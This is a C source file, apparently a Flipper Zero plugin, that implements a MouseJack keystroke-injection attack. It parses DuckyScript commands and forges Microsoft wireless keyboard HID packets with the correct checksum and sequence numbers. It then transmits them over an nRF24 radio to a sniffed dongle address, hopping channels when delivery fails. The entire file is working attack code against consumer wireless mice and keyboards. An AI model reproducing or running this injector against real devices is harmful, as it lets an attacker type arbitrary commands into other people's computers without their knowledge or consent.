mousejacker_ducky.c 17 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419
  1. #include "mousejacker_ducky.h"
  2. #include "stdstring.h"
  3. static const char ducky_cmd_comment[] = {"REM"};
  4. static const char ducky_cmd_delay[] = {"DELAY "};
  5. static const char ducky_cmd_string[] = {"STRING "};
  6. static const char ducky_cmd_repeat[] = {"REPEAT "};
  7. // Bytes 0 to 3 are hardcoded for my specific mouse (they should be known after the sniffing but addresses.txt doesn't save them)
  8. static uint8_t MICROSOFT_HID_TEMPLATE[] = {
  9. 0x08,
  10. 0x90,
  11. 0x19,
  12. 0x01,
  13. 0x00,
  14. 0x00,
  15. 67,
  16. 0x00,
  17. 0x00,
  18. 0x00,
  19. 0x00,
  20. 0x00,
  21. 0x00,
  22. 0x00,
  23. 0x00,
  24. 0x00,
  25. 0x00,
  26. 0x00,
  27. 0x00};
  28. uint8_t prev_hid = 0;
  29. uint8_t sequence_num = 0;
  30. #define RT_THRESHOLD 50
  31. #define MICROSOFT_MIN_CHANNEL 2
  32. #define MICROSOFT_MAX_CHANNEL 83
  33. #define MICROSOFT_HID_TEMPLATE_SIZE 19
  34. #define TAG "mousejacker_ducky"
  35. MJDuckyKey mj_ducky_keys[] = {{" ", 44, 0}, {"!", 30, 2}, {"\"", 52, 2},
  36. {"#", 32, 2}, {"$", 33, 2}, {"%", 34, 2},
  37. {"&", 36, 2}, {"'", 52, 0}, {"(", 38, 2},
  38. {")", 39, 2}, {"*", 37, 2}, {"+", 46, 2},
  39. {",", 54, 0}, {"-", 45, 0}, {".", 55, 0},
  40. {"/", 56, 0}, {"0", 39, 0}, {"1", 30, 0},
  41. {"2", 31, 0}, {"3", 32, 0}, {"4", 33, 0},
  42. {"5", 34, 0}, {"6", 35, 0}, {"7", 36, 0},
  43. {"8", 37, 0}, {"9", 38, 0}, {":", 51, 2},
  44. {";", 51, 0}, {"<", 54, 2}, {"=", 46, 0},
  45. {">", 55, 2}, {"?", 56, 2}, {"@", 31, 2},
  46. {"A", 4, 2}, {"B", 5, 2}, {"C", 6, 2},
  47. {"D", 7, 2}, {"E", 8, 2}, {"F", 9, 2},
  48. {"G", 10, 2}, {"H", 11, 2}, {"I", 12, 2},
  49. {"J", 13, 2}, {"K", 14, 2}, {"L", 15, 2},
  50. {"M", 16, 2}, {"N", 17, 2}, {"O", 18, 2},
  51. {"P", 19, 2}, {"Q", 20, 2}, {"R", 21, 2},
  52. {"S", 22, 2}, {"T", 23, 2}, {"U", 24, 2},
  53. {"V", 25, 2}, {"W", 26, 2}, {"X", 27, 2},
  54. {"Y", 28, 2}, {"Z", 29, 2}, {"[", 47, 0},
  55. {"\\", 49, 0}, {"]", 48, 0}, {"^", 35, 2},
  56. {"_", 45, 2}, {"`", 53, 0}, {"a", 4, 0},
  57. {"b", 5, 0}, {"c", 6, 0}, {"d", 7, 0},
  58. {"e", 8, 0}, {"f", 9, 0}, {"g", 10, 0},
  59. {"h", 11, 0}, {"i", 12, 0}, {"j", 13, 0},
  60. {"k", 14, 0}, {"l", 15, 0}, {"m", 16, 0},
  61. {"n", 17, 0}, {"o", 18, 0}, {"p", 19, 0},
  62. {"q", 20, 0}, {"r", 21, 0}, {"s", 22, 0},
  63. {"t", 23, 0}, {"u", 24, 0}, {"v", 25, 0},
  64. {"w", 26, 0}, {"x", 27, 0}, {"y", 28, 0},
  65. {"z", 29, 0}, {"{", 47, 2}, {"|", 49, 2},
  66. {"}", 48, 2}, {"~", 53, 2}, {"BACKSPACE", 42, 0},
  67. {"", 0, 0}, {"ALT", 0, 4}, {"SHIFT", 0, 2},
  68. {"CTRL", 0, 1}, {"GUI", 0, 8}, {"SCROLLLOCK", 71, 0},
  69. {"ENTER", 40, 0}, {"F12", 69, 0}, {"HOME", 74, 0},
  70. {"F10", 67, 0}, {"F9", 66, 0}, {"ESCAPE", 41, 0},
  71. {"PAGEUP", 75, 0}, {"TAB", 43, 0}, {"PRINTSCREEN", 70, 0},
  72. {"F2", 59, 0}, {"CAPSLOCK", 57, 0}, {"F1", 58, 0},
  73. {"F4", 61, 0}, {"F6", 63, 0}, {"F8", 65, 0},
  74. {"DOWNARROW", 81, 0}, {"DELETE", 42, 0}, {"RIGHT", 79, 0},
  75. {"F3", 60, 0}, {"DOWN", 81, 0}, {"DEL", 76, 0},
  76. {"END", 77, 0}, {"INSERT", 73, 0}, {"NUMLOCK", 83, 0},
  77. {"F5", 62, 0}, {"LEFTARROW", 80, 0}, {"RIGHTARROW", 79, 0},
  78. {"PAGEDOWN", 78, 0}, {"PAUSE", 72, 0}, {"SPACE", 44, 0},
  79. {"UPARROW", 82, 0}, {"F11", 68, 0}, {"F7", 64, 0},
  80. {"UP", 82, 0}, {"LEFT", 80, 0}};
  81. /*
  82. static bool mj_ducky_get_number(const char* param, uint32_t* val) {
  83. uint32_t value = 0;
  84. if(sscanf(param, "%lu", &value) == 1) {
  85. *val = value;
  86. return true;
  87. }
  88. return false;
  89. }
  90. */
  91. static uint32_t mj_ducky_get_command_len(const char* line) {
  92. uint32_t len = strlen(line);
  93. for(uint32_t i = 0; i < len; i++) {
  94. if(line[i] == ' ') return i;
  95. }
  96. return 0;
  97. }
  98. static bool mj_get_ducky_key(char* key, size_t keylen, MJDuckyKey* dk) {
  99. //FURI_LOG_D(TAG, "looking up key %s with length %d", key, keylen);
  100. for(size_t i = 0; i < sizeof(mj_ducky_keys) / sizeof(MJDuckyKey); i++) {
  101. if(!strncmp(mj_ducky_keys[i].name, key, keylen)) {
  102. memcpy(dk, &mj_ducky_keys[i], sizeof(MJDuckyKey));
  103. return true;
  104. }
  105. }
  106. return false;
  107. }
  108. static void checksum(uint8_t* payload, size_t len) {
  109. // MS checksum algorithm - as per KeyKeriki paper
  110. payload[len - 1] = 0x00;
  111. for(size_t n = 0; n < len - 2; n++)
  112. payload[len - 1] ^= payload[n];
  113. payload[len - 1] = ~payload[len - 1] & 0xff;
  114. }
  115. static void sequence(uint8_t* payload) {
  116. // MS frames use a 2 bytes sequence number
  117. payload[5] = (sequence_num >> 8) & 0xff;
  118. payload[4] = sequence_num & 0xff;
  119. sequence_num += 1;
  120. }
  121. static void inject_packet(
  122. FuriHalSpiBusHandle* handle,
  123. uint8_t* addr,
  124. uint8_t addr_size,
  125. uint8_t rate,
  126. uint8_t* payload,
  127. size_t payload_size,
  128. PluginState* plugin_state) {
  129. uint8_t rt_count = 0;
  130. while(1) {
  131. if(!plugin_state->is_thread_running || plugin_state->close_thread_please) {
  132. return;
  133. }
  134. if(nrf24_txpacket(handle, payload, payload_size, true)) {
  135. break;
  136. }
  137. rt_count++;
  138. // retransmit threshold exceeded, scan for new channel
  139. if(rt_count > RT_THRESHOLD) {
  140. if(nrf24_find_channel(
  141. handle,
  142. addr,
  143. addr,
  144. addr_size,
  145. rate,
  146. MICROSOFT_MIN_CHANNEL,
  147. MICROSOFT_MAX_CHANNEL,
  148. true) > MICROSOFT_MAX_CHANNEL) {
  149. return; // fail
  150. }
  151. //FURI_LOG_D("mj", "find channel passed, %d", tessst);
  152. rt_count = 0;
  153. }
  154. }
  155. }
  156. static void build_hid_packet(uint8_t mod, uint8_t hid, uint8_t* payload) {
  157. memcpy(payload, MICROSOFT_HID_TEMPLATE, MICROSOFT_HID_TEMPLATE_SIZE);
  158. payload[7] = mod;
  159. payload[9] = hid;
  160. sequence(payload);
  161. checksum(payload, MICROSOFT_HID_TEMPLATE_SIZE);
  162. /*uint8_t byte;
  163. uint8_t i;
  164. FURI_LOG_I(TAG, "build_hid_packet");
  165. for(i=0; i < MICROSOFT_HID_TEMPLATE_SIZE; i++) {
  166. byte = payload[i];
  167. FURI_LOG_I(TAG, "%02x ", byte);
  168. }*/
  169. }
  170. static void send_hid_packet(
  171. FuriHalSpiBusHandle* handle,
  172. uint8_t* addr,
  173. uint8_t addr_size,
  174. uint8_t rate,
  175. uint8_t mod,
  176. uint8_t hid,
  177. PluginState* plugin_state) {
  178. uint8_t hid_payload[MICROSOFT_HID_TEMPLATE_SIZE] = {0};
  179. build_hid_packet(0, 0, hid_payload);
  180. if(hid == prev_hid)
  181. inject_packet(
  182. handle,
  183. addr,
  184. addr_size,
  185. rate,
  186. hid_payload,
  187. MICROSOFT_HID_TEMPLATE_SIZE,
  188. plugin_state); // empty hid packet
  189. prev_hid = hid;
  190. build_hid_packet(mod, hid, hid_payload);
  191. inject_packet(
  192. handle, addr, addr_size, rate, hid_payload, MICROSOFT_HID_TEMPLATE_SIZE, plugin_state);
  193. furi_delay_ms(12);
  194. }
  195. // returns false if there was an error processing script line
  196. static bool mj_process_ducky_line(
  197. FuriHalSpiBusHandle* handle,
  198. uint8_t* addr,
  199. uint8_t addr_size,
  200. uint8_t rate,
  201. char* line,
  202. char* prev_line,
  203. PluginState* plugin_state) {
  204. MJDuckyKey dk;
  205. uint8_t hid_payload[MICROSOFT_HID_TEMPLATE_SIZE] = {0};
  206. char* line_tmp = line;
  207. uint32_t line_len = strlen(line);
  208. if(!plugin_state->is_thread_running || plugin_state->close_thread_please) {
  209. return true;
  210. }
  211. for(uint32_t i = 0; i < line_len; i++) {
  212. if((line_tmp[i] != ' ') && (line_tmp[i] != '\t') && (line_tmp[i] != '\n')) {
  213. line_tmp = &line_tmp[i];
  214. break; // Skip spaces and tabs
  215. }
  216. if(i == line_len - 1) return true; // Skip empty lines
  217. }
  218. FURI_LOG_D(TAG, "line: %s", line_tmp);
  219. // General commands
  220. if(strncmp(line_tmp, ducky_cmd_comment, strlen(ducky_cmd_comment)) == 0) {
  221. // REM - comment line
  222. return true;
  223. } else if(strncmp(line_tmp, ducky_cmd_delay, strlen(ducky_cmd_delay)) == 0) {
  224. // DELAY
  225. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  226. uint32_t delay_val = 0;
  227. delay_val = atoi(line_tmp);
  228. if(delay_val > 0) {
  229. uint32_t delay_count = delay_val / 10;
  230. build_hid_packet(0, 0, hid_payload);
  231. inject_packet(
  232. handle,
  233. addr,
  234. addr_size,
  235. rate,
  236. hid_payload,
  237. MICROSOFT_HID_TEMPLATE_SIZE,
  238. plugin_state); // empty hid packet
  239. for(uint32_t i = 0; i < delay_count; i++) {
  240. if(!plugin_state->is_thread_running || plugin_state->close_thread_please) {
  241. return true;
  242. }
  243. /*inject_packet(
  244. handle,
  245. addr,
  246. addr_size,
  247. rate,
  248. LOGITECH_KEEPALIVE,
  249. LOGITECH_KEEPALIVE_SIZE,
  250. plugin_state);*/
  251. furi_delay_ms(10);
  252. }
  253. return true;
  254. }
  255. return false;
  256. } else if(strncmp(line_tmp, ducky_cmd_string, strlen(ducky_cmd_string)) == 0) {
  257. // STRING
  258. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  259. for(size_t i = 0; i < strlen(line_tmp); i++) {
  260. if(!mj_get_ducky_key(&line_tmp[i], 1, &dk)) return false;
  261. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  262. }
  263. return true;
  264. } else if(strncmp(line_tmp, ducky_cmd_repeat, strlen(ducky_cmd_repeat)) == 0) {
  265. // REPEAT
  266. uint32_t repeat_cnt = 0;
  267. if(prev_line == NULL) return false;
  268. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  269. repeat_cnt = atoi(line_tmp);
  270. if(repeat_cnt < 2) return false;
  271. FURI_LOG_D(TAG, "repeating %s %ld times", prev_line, repeat_cnt);
  272. for(uint32_t i = 0; i < repeat_cnt; i++)
  273. mj_process_ducky_line(handle, addr, addr_size, rate, prev_line, NULL, plugin_state);
  274. return true;
  275. } else if(strncmp(line_tmp, "ALT", strlen("ALT")) == 0) {
  276. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  277. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  278. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 4, dk.hid, plugin_state);
  279. return true;
  280. } else if(
  281. strncmp(line_tmp, "GUI", strlen("GUI")) == 0 ||
  282. strncmp(line_tmp, "WINDOWS", strlen("WINDOWS")) == 0 ||
  283. strncmp(line_tmp, "COMMAND", strlen("COMMAND")) == 0) {
  284. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  285. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  286. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 8, dk.hid, plugin_state);
  287. return true;
  288. } else if(
  289. strncmp(line_tmp, "CTRL-ALT", strlen("CTRL-ALT")) == 0 ||
  290. strncmp(line_tmp, "CONTROL-ALT", strlen("CONTROL-ALT")) == 0) {
  291. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  292. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  293. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 4 | 1, dk.hid, plugin_state);
  294. return true;
  295. } else if(
  296. strncmp(line_tmp, "CTRL-SHIFT", strlen("CTRL-SHIFT")) == 0 ||
  297. strncmp(line_tmp, "CONTROL-SHIFT", strlen("CONTROL-SHIFT")) == 0) {
  298. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  299. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  300. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 1 | 2, dk.hid, plugin_state);
  301. return true;
  302. } else if(
  303. strncmp(line_tmp, "CTRL", strlen("CTRL")) == 0 ||
  304. strncmp(line_tmp, "CONTROL", strlen("CONTROL")) == 0) {
  305. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  306. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  307. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 1, dk.hid, plugin_state);
  308. return true;
  309. } else if(strncmp(line_tmp, "SHIFT", strlen("SHIFT")) == 0) {
  310. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  311. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  312. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 2, dk.hid, plugin_state);
  313. return true;
  314. } else if(
  315. strncmp(line_tmp, "ESC", strlen("ESC")) == 0 ||
  316. strncmp(line_tmp, "APP", strlen("APP")) == 0 ||
  317. strncmp(line_tmp, "ESCAPE", strlen("ESCAPE")) == 0) {
  318. if(!mj_get_ducky_key("ESCAPE", 6, &dk)) return false;
  319. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  320. return true;
  321. } else if(strncmp(line_tmp, "ENTER", strlen("ENTER")) == 0) {
  322. if(!mj_get_ducky_key("ENTER", 5, &dk)) return false;
  323. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  324. return true;
  325. } else if(
  326. strncmp(line_tmp, "UP", strlen("UP")) == 0 ||
  327. strncmp(line_tmp, "UPARROW", strlen("UPARROW")) == 0) {
  328. if(!mj_get_ducky_key("UP", 2, &dk)) return false;
  329. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  330. return true;
  331. } else if(
  332. strncmp(line_tmp, "DOWN", strlen("DOWN")) == 0 ||
  333. strncmp(line_tmp, "DOWNARROW", strlen("DOWNARROW")) == 0) {
  334. if(!mj_get_ducky_key("DOWN", 4, &dk)) return false;
  335. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  336. return true;
  337. } else if(
  338. strncmp(line_tmp, "LEFT", strlen("LEFT")) == 0 ||
  339. strncmp(line_tmp, "LEFTARROW", strlen("LEFTARROW")) == 0) {
  340. if(!mj_get_ducky_key("LEFT", 4, &dk)) return false;
  341. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  342. return true;
  343. } else if(
  344. strncmp(line_tmp, "RIGHT", strlen("RIGHT")) == 0 ||
  345. strncmp(line_tmp, "RIGHTARROW", strlen("RIGHTARROW")) == 0) {
  346. if(!mj_get_ducky_key("RIGHT", 5, &dk)) return false;
  347. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  348. return true;
  349. } else if(strncmp(line_tmp, "SPACE", strlen("SPACE")) == 0) {
  350. if(!mj_get_ducky_key("SPACE", 5, &dk)) return false;
  351. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  352. return true;
  353. } else if(strncmp(line_tmp, "NUMLOCK", strlen("NUMLOCK")) == 0) {
  354. if(!mj_get_ducky_key("NUMLOCK", 7, &dk)) return false;
  355. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  356. return true;
  357. }
  358. return false;
  359. }
  360. void mj_process_ducky_script(
  361. FuriHalSpiBusHandle* handle,
  362. uint8_t* addr,
  363. uint8_t addr_size,
  364. uint8_t rate,
  365. char* script,
  366. PluginState* plugin_state) {
  367. uint8_t hid_payload[MICROSOFT_HID_TEMPLATE_SIZE] = {0};
  368. char* prev_line = NULL;
  369. /*inject_packet(
  370. handle, addr, addr_size, rate, LOGITECH_HELLO, LOGITECH_HELLO_SIZE, plugin_state);*/
  371. char* line = nrf_strtok(script, "\n");
  372. while(line != NULL) {
  373. if(strcmp(&line[strlen(line) - 1], "\r") == 0) line[strlen(line) - 1] = (char)0;
  374. if(!mj_process_ducky_line(handle, addr, addr_size, rate, line, prev_line, plugin_state))
  375. FURI_LOG_D(TAG, "unable to process ducky script line: %s", line);
  376. prev_line = line;
  377. line = nrf_strtok(NULL, "\n");
  378. }
  379. build_hid_packet(0, 0, hid_payload);
  380. inject_packet(
  381. handle,
  382. addr,
  383. addr_size,
  384. rate,
  385. hid_payload,
  386. MICROSOFT_HID_TEMPLATE_SIZE,
  387. plugin_state); // empty hid packet at end
  388. }